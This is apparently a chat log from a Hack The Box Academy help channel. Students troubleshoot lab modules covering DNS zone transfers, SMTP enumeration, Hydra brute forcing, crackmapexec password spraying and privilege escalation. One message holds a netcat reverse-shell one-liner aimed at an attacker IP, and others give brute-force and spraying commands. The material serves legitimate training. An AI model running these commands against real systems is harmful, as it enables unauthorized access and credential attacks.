[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
curl: (7) Failed to connect to www.google.com port 80 after 3219 ms: Couldn't connect to server
Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.
I'm honestly not sure; looks like you may be using a different version of Proxychains (ver. 4?). I'm currently using 3.1. I did find this:
https://unix.stackexchange.com/questions/624969/how-to-configure-proxychains-properly
Not the exact issue, but something similar
idk what is going on but you do not need proxychains for burpsuite
they are testing CMD line tools to use Burpsuite as a proxy, for the Module Using Web Proxies Section: Proxying Tools
Hey i was stuck with the same error yesterday
All I needed to do was keep Burp Suite intercept mode on before running the proxychains curl command
Silly me
lol that'll do it.
well that is shown in the section material
Yeah I have the intercept running
Strict_chain is enabled.
do you have any weird settings in the /etc/hosts file?
can you curl without proxychains?
Nothing out of the norm in the hosts file and I can curl without proxychains.
weird
Heck yeah!
Try netstat -anp | grep :8080 to see if you get anything
Nothing
Ahh, something is wrong with Burp Suite then. It's not opening the port.
Have you already tried restarting Burp?
Yes as well as specifying the IP 127.0.0.1:8080 in the proxy listeners
do you have any other applications trying to use 8080? Maybe try a different port?
Switch and still nothing. I don't get it.
You're using the wrong hash type. Try ||5600||
||5600 NetNTLMv2||
Ya, it's not making any sense. The port should show as open in the system, but it's not (using the netstat command). The only thing I can suggest would be to find out why Burp isn't opening the port.
Appreciate all your help G
damn
I thought I'm on 5600
my bad and thx
spoiler
Good day, all. Having trouble with the Intro to Assembly Language final skill assessment, question number 1 (Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8 bytes on the stack with the key in 'rbx'.)
I put the disassembled shellcode on the stack in assembler, looped over it while xoring each 8 bytes with rbx, printf'ed it, and tried connecting the 8-byte shellcode pieces in both directions (meaning from beginning to end and vice versa). No correct answer. Am I following the right direction here...? Spent 2 days already on it.
How can I blur the image
Who can help me with this Open Beta Season III - Visual
ask that in #1157735501516779711
Hey man, I know this is a long-ago post, but I am doing this and I get one hit, which is my existing user. I have used the -Force switch to tell it to keep going but it keeps stopping at the first match. Do you know if there is anything else other than the -Force switch that should be used?
this helps - thank you. I figured it out now
I am now stuck on the third question 'Find and submit the contents of the TXT record as the answer'
(https://academy.hackthebox.com/module/144/section/1256) - I performed a dig search on both of the previously identified zones on the name server, and the hint says that one of the existing zones contains a TXT record - but I found nothing other than an A record on one, and a SOA record on the other that links back to itself and the other zone
any pointers?
I tried doing zone transfers to find information but everything I tried so far has failed
Not sure if you have this module unlocked, but it explains DNS zone transfers in more detail. At least it helped me to answer the questions that you are stuck on: https://academy.hackthebox.com/module/112/section/1069
How can I reach technical support?
Do a DNS recon using dnsenum; you will find some subdomains, and there is one that contains your answer
Now I'm getting this
rdesktop 10.129.156.189 -u htb-student -p Academy_student_AD!
Put the password in single quotes
Try xfreerdp /v:10.129.156.189 /u:htb-student /p:'Academy_student_AD!'
black screen XD again
🤔
and it worked
Was it black screen?
Use remmina
Hey g, you think it has to do with me using WSL?
lol ofc
Thanks
yes def, a lot of things do not run well using WSL
Thanks
In "Hacking Wordpress" in the Skills Assessment I get the following message after going for a wpscan:
```
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
```
I have a follow up question what if I do something that requires a password and I do not know it. how do I get out of it?
Look at the source code.
The main page is not a Wordpress, so the scan is aborted.
knowing the password
I meant I do not know the password, and I did something by mistake that requires the pass. Now if I use Ctrl+C the reverse shell kills itself
How do I get out of the password input prompt without triggering the incorrect password or killing the shell?
use an interactive shell
reverse shells are not a tty
I use the stty raw method
if it is a windows machine you better take a look at ConPtyShell
I have not yet touched a windows machine
Thanks, got it now. I know, always "try harder", but I think sometimes these modules are really dumb, like never mentioning this within the first 10 sections and then in the skills assessment you get thrown under the bus. This is not a learning experience; this is straight up wasting people's time and creating unnecessary frustration. If I want to be frustrated by not knowing things and learn, I go to the HTB platform, not the academy
In the modules they explain to you how to upgrade a shell to a tty
not your problem but had to let some steam off sry
good luck with the exam then
skill assessments are not meant to be the same as sections but use what you have seen on them
The module shows you how to find a Wordpress instance. In the skills assessments you can prove your knowledge.
It is important to understand why you are taking one step or another.
Taking the step is usually easy.
how long does it take for the xss session hijacking labs admin to review the request so it triggers the xss
Is CBBH just more focused on the web application side of things compared to CPTS? Looks like CPTS covers most of the CBBH stuff.
cbbh = web pentest, cpts = enterprise environment pentest (here you can find web apps running)
Is anyone able to call or something to help me with DNS questions? I'm having a really hard time understanding & I'm not sure what I'm doing wrong
bro I just tagged you earlier on where to read more
Yes, I know, and I read it, but I'm not sure what to do
just ask
we can help
Working on this module: https://academy.hackthebox.com/module/144/section/1256
Right now, working on the question that asks about the zones. I found that the answer is two, but I do not know what the second one is - I misunderstood what it was asking and got it right on accident.
As far as it seems to me, there is only one because I can dig the domain (ns.inlanefreight.htb) and I get the following:
; <<>> DiG 9.18.12-1-Debian <<>> any ns.inlanefreight.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37263
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;ns.inlanefreight.htb. IN ANY
;; ANSWER SECTION:
ns.inlanefreight.htb. 900 IN SOA ns1-etm.att.net. nomail.etm.att.net. 1 604800 3600 2419200 900
;; Query time: 1179 msec
;; SERVER: 192.168.1.254#53(192.168.1.254) (TCP)
;; WHEN: Wed Oct 04 12:13:40 PDT 2023
;; MSG SIZE rcvd: 111
Due to there being only one SOA record, would that not mean that there is only one zone? I'm not sure how I would find the other zone
Does the academy student plan have practice machines, or do I need to get the HTB VIP sub?
academy is a different site
a zone is a set of subdomains
for record, the command I used is:
dig any ns.inlanefreight.htb
if you try axfr in all those subdomains you will find that another one is able to do axfr
then you have 2 zones
In all what subdomains though? I don't understand
you do axfr zone transfer in the zone provided in the exercise
right? are you there?
that returns some subdomains which means it is a zone
you can also do nslookup it gives you subdomains
i personally prefer dig
I keep getting communication errors as well, not sure why - it's pingable for me
└─$ dig axfr ns.inlanefreight.htb
;; communications error to 192.168.1.254#53: timed out
;; communications error to 192.168.1.254#53: timed out
;; communications error to 192.168.1.254#53: timed out
; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb
;; global options: +cmd
; Transfer failed.
Yeah, me too, but I found the answer with nslookup and not with dig ahah
you have to tell the ip address
recheck the module
dig axfr ns.inlanefreight.htb @ip
the target
the ip of the target
the ip of the server in this case the target provided
└─$ dig axfr ns.inlanefreight.htb 10.129.218.66
; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb 10.129.218.66
;; global options: +cmd
; Transfer failed.
you have a server with the dns port open usually 53
Getting transfer failed still, but it connected at least
put an @ before the ip
I tried that too, same result
Well, I tried the one with the @ too, but it gave the same thing
┌──(jeremy㉿kali)-[~]
└─$ dig axfr ns.inlanefreight.htb @10.129.218.66
; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb @10.129.218.66
;; global options: +cmd
; Transfer failed.
ns is not a zone, it is a NameServer
try other subdomains it's not the one
Yea lol, you have to specify the domain
dig axfr domain @server
you can specify a subdomain also but the one with the axfr enabled is told to you in the 1st question
try with nslookup
Okay, I got somewhere by just digging itself
nslookup -type=any -query=axfr inlanefreight.htb ip
gave me what looks like a zone file
yes i just got that now
cool
just trying to figure out where to go now
this means it is 1 zone
Why do you try a query with ANY when you request a zone transfer?
in the subdomains found there can be also another zone
the quick way is to just try axfr in all the discovered subdomains
it's just a habit and a copy and paste
you can use grep for this and make a loop
oh i got it
but i have a question
Would this entry not mean that 'internal.inlanefreight.htb' is the same machine that I'm interacting with? If so, why does digging inlanefreight.htb and digging internal.inlanefreight.htb yield different results?
then ask
meaning the same machine because of the loopback address
for host in $(dig axfr inlanefreight.htb @10.129.216.178 | grep "10.10." | awk '{print $1}' | sed 's/\.$//'); do echo "10.129.216.178 $host" | sudo tee -a /etc/hosts; done
For example, this can help you (the first column of the AXFR output is the hostname, with its trailing dot stripped; `sudo tee -a` is used because `sudo echo >>` would redirect as the unprivileged user)
i already got the subdomain that had it but thank you
Luckily it was near the top of the list, or else I'd have to use that haha
need some help on SMTP attacking common services module
Trying to answer the first question, enumerating for usernames: I've tried Metasploit's smtp user enum, I've tried smtp-user-enum, I've tried telnet and openssl connect and hydra; still no dice
what's your command for smtp-user-enum
smtp-user-enum -M RCPT -u users.list -D inlanefreight.htb -t 10.129.105.180
Keep in mind that certain servers may take a little longer to respond.
weird i just tried it work for me
weird try to reboot the target
and you put the new ip in your host file?
yup
yeah weird you should get your answer
Why is username count 1?
not sure
theirs prob 50 usernames in the list
----------------------------------------------------------
|                   Scan Information                     |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 180 secs
Target domain ............ inlanefreight.htb
######## Scan started at Wed Oct 4 15:52:39 2023 #########
######## Scan completed at Wed Oct 4 15:52:39 2023 #########
0 results.
1 queries in 1 seconds (1.0 queries / sec)
whoops
smtp-user-enum -M RCPT -u /root/Downloads/users.list -D inlanefreight.htb -t 10.129.149.47 -w 180
yeah
i am
Even copied and pasted usernames into another list and tried; still no dice, I don't get it
wow
still 1 username count?
figured it out
it was because i was using -u instead of -U
thats the most annoying thing in the world
I'll be on suicide watch for the next 2 hours
yes, and the server kills the session in the meantime lol
Lmao that shit got me with hydra once. Was on -l instead of -L
imagine reading help panel 
what error
u and U, man, they look the same capitalized
ya i was using -u instead of -U
lmao
glad u got it
imagine if it would be
I actually see payloadbunny in the forums lol
What does my name show up as to y'all?
it says ChangeMe to me
it does
Evolution
Has anyone finished Introduction to Web Applications module, please? I'm stuck on question "Check the above login form for exposed passwords. Submit the password as the answer." in Sensitive Data Exposure section.
oh right mb
enumerate what you can about the website
# Module: Password Attacks
# Section: Password Mutations
Tried bruteforcing the FTP instead of SSH cuz it's faster; it took me like 45 mins but it came out empty. Can anybody give me the length of the password so that I could filter the list and try again?
Thank you
There's only one login form as an example with its comment with password test. Went through the entire source code.
Look at the question carefully: "Submit the password as the answer."
Use the lists and rules provided in resources
I did use the given list
Did you mutate it as described in the section?
of course i did
Also you can bump hydra threads to 48 relatively safely without false negative
I set it 64
I'm trying something new; if that doesn't work, I will set it to low and try again
I definitely had false positives with 64 threads on hydra with ftp
I reran it with 32 or so and that worked
The only password I found is test. That's an incorrect answer though.
your section is : Sensitive Data Exposure?
Yes
Solved, just enum better
also be careful with cached source code
ctrl shift R to hard refresh
@mossy hatch Can I dm?
Hi, I am stuck at privilege escalation. I am currently doing the knowledge check section of the Getting Started module in CPTS. The machine uses the GetSimple application. I did some digging and found out it was using GetSimple 3.3.15. It has an RCE exploit with id CVE-2019-11231. I tried reading the blog but I got confused as to how I should use the API key. Then I tried using the Metasploit exploit and I successfully gained the foothold. Then I tried running the LinPEAS and LinEnum scripts; they both say that I can NOPASSWD on /usr/bin/php, but when I try to access the directory I get permission denied
a little help please
gtfobins is your friend
you can run php as sudo without password is what that means
you can see it easier and quicker with sudo -l
I tried sudo -l
I saw /usr/bin/php is nopasswd
I tried to add a reverse shell in the directory but it says permission denied
www-data@gettingstarted:/usr/bin$ ls -l php
ls -l php
lrwxrwxrwx 1 root root 21 Feb 9 2021 php -> /etc/alternatives/php
www-data@gettingstarted:/usr/bin$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.20 7969 > /tmp/f" >> php
<bin/sh -i 2>&1|nc 10.10.15.20 7969 > /tmp/f" >> php
bash: php: Permission denied
🥲
i cannot
Sorry, I mistyped it, directory
And read the gtfobins entry on php closer
Cause, not to sound like a dick, but there's so many things wrong with your attempt there it's hard to explain it all without just spoiling the answer
but the biggest is that php is not a directory and directories have nothing to do with the situation
Also, the Information Security Foundations path is gonna give you a lot of valuable information
do it before Getting Started (in pentesting) module
....
did you cd into php?...🥹
That's deep...
Module: Broken Authentication
Section: Predictable Reset Token
Question:
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
Am I supposed to make my own script?
yez
you can use the php script from the section also
What I did was a custom Python script that triggers the htbuser token generation and after that sends all the possible htbadmin tokens via POST (all those from +-1 second)
And if it finds "Wrong" in the response text it just keeps trying, and if it doesn't find it, it returns the response text and breaks the loop
Thanks a bunch @sly dome
any time
Did anyone ever have issues with data showing up in elastic on Security Monitoring & SIEM Fundamentals
Anyone have some wisdom for me in the Password Attacks Module? Attacking network services at the moment and Hydra is quoting me ~21 hours to finish a bruteforce. Unfortunately, I can extend neither the PwnBox or the target system that long. The restore file also seems to only start me back where I started, and not where I left off. Anything you guys have got would be appreciated. Thanks!
This is under the "Password Mutations" section of the module.
Hi there,
I'm doing the web enumeration module in the penetration path and it is asking me to add a DNS server such as 1.1.1.1 to the /etc/resolv.conf file
I'm having a hard time figuring out how to do it and was hoping for some guidance
don't brute force SSH basically, too slow
which section is that?
it is in the getting started module https://academy.hackthebox.com/module/details/77 under web enumeration
it's not the only service running and the question says you need to log in with SSH after, not that it's explicitly what you have to brute force
You are a sharper man than I
try running the command without adding cloudflare dns’s
it was a tedious module tbh, lots of waiting around for things to finish lol
You can add them by editing the /etc/resolv.conf file
I'm pretty new to this all, I'm quite green. Not one hundred percent sure what you mean
I'm unsure how to edit it
I tried to use vim to edit it, but not sure that's the right way to go about it
Aah, I see
It is not Getting Started from zero, it is Getting Started in Pentesting
Is knowledge about C++ always a key to get into reverse engineering?
Thanks for the information, I'll give that a shot and have to come back to it
C is considered mandatory to know for RE by a lot of people, so I'd say yes
not everything will be coded in C/C++ but a lot of the compiled code around the world was written in those languages
what learning C really gives you is to see patterns, memory calls and all that stuff
thanks
always remember RE is not specific to 1 language
Yea but often it is C/C++
very often
also you need skills on Assembly
Intel and AT&T syntaxes
for windows and unix
A very complicated and deep field, the RE one; good luck boy
Also, what currency is HTB in? Is it USD or EUR?
I'm in Australia, so does that mean it would be AUD then?
Can someone help me with this module's third question?
What is the FQDN of the associated subdomain?
Associated subdomain is monitoring.inlanefreight.local
Through the web site I brute forced the login and found a password and user. I ended up at a terminal or admin page?
However, I can't use other commands except those from the help list. How can I find the FQDN from that?
It's been 3 days; I tried to do everything with monitoring.inlanefreight.local. I found only that
I also tried command injection but failed
Yeah I tried
I tried to enter any domain that i found using brute force and zone transfer first day
But none of them were the FQDN, then I focused on monitoring, because that subdomain is the only one mentioned in that module
Currently I am in that session. I found command injection; hope I will find something worthy
Did you try a zone transfer?
Yes
Zone transfer on the monitoring domain didn't work
then i tried brute force but can't find anything
did you zone transfer on just inlanefreight.local?
Hello guys, in AD enumeration I'm dealing with this question: Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
[✗]─[htb-student@ea-attack01]─[/opt]
└──╼ $sudo crackmapexec smb 172.16.5.5 -u jsmith.txt -p Welcome1 | grep +
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\tjohnson:Welcome1
┌─[htb-student@ea-attack01]─[/opt]
But I'm having as answer only this user
I did, found some subdomains. I checked every subdomain with dig, nslookup with every flag and zone transfer, but failed
I found something interesting, I bypassed filters and found command injection from monitoring I think i have to find something from that
You might be overthinking it.
Maybe, because I am crazy now; for 3 days I have enumerated every subdomain that I found, but failed. It is annoying; even help is not available for that question
When you did the zone transfer on inlanefreight.local, do any of those subdomains stand out to you?
Add --continue-on-success at the end of your command
Crackmapexec otherwise stops at first match
Think that change was made after the module was written
I tried, zone transfer for subdomains didn't work
but do any of those subdomain names look interesting? regarding a flag?
I tried, now I am trying again but nothing. Did you finish that module?
yeah
What is the zone transfer command you're using?
Did you find the FQDN?
axfr
dig axfr support.inlanefreight.local @10.129.97.182
this for subdomains
only inlanefreight.local working
Same output with module but with flag
with flag????
I mean flag subdomain
Please help, I need a nudge on what wordlist to use for flag 4 of the web edition footprinting
let me double check
You're on question 3, correct?
i am on question 4
OMG 😱 🤦♂️ found it, thank you
Why did I focus on monitoring...
happy to help!
its easy to get that tunnel vision on these, glad you got it!
I expected this kind of simple answer; I knew I would be surprised, because this kind of situation happened before, an elementary stupid mistake and losing a lot of time 🤦♂️
Thank you bro
no problem.
web edition footprinting?
yes
did you mean information gathering?
yes sorry you are right
which section
which section please
vhost
use seclists namelist.txt
thank you. i'll give that a try.
Thank you so much
In the forum itself it showed how to find the answer to that question. Pay attention to the output of the ffuf brute force; there is "REDIRECTED". Use that ffuf command
@sly dome thank you for the help i was able to finish vhosts
Anyone here who can help me with the third question on Using Crackmapexec - Skills Assessment?
sure shoot me a dm if you still need but spoiler alert this assessment is going to be a long one
I am going crazy with the Windows Fundamentals module; every single thing is new to me and I can't seem to get a grasp of anything. Can anyone help in learning it? If you have resources for like zero knowledge of Windows from a security perspective, much appreciated
Anyone have any success getting a file off of the pwnbox onto your local VM? I am trying python3 -m http.server but I can't get a connection
depends on what format the file is, otherwise copy/paste
It's a .zip file
